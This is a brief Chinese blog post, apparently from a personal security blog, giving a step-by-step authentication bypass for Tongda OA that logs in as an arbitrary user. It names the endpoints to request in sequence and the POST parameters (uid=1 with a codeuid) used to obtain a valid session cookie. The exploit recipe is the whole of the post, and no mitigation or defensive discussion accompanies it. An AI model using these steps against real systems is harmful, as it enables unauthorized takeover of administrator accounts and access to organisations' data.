Posted 2020-09-15Updated 2021-03-03Updated 2021-03-03WEB安全a few seconds read (About 77 words)0 visits通达OA任意用户登陆1、首先访问 /ispirit/login_code.php 获取 codeuid。 2、访问 /general/login_code_scan.php 提交 post 参数: uid=1&codeuid={9E908086-342B-2A87-B0E9-E573E226302A} 然后构造数据包请求/logincheck_code.php 得到cookie 通达OA任意用户登陆http://www.ol4three.com/2020/09/15/WEB/Exploit/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E7%99%BB%E9%99%86/Authorol4threePosted on2020-09-15Updated on2021-03-03Licensed under 通达OA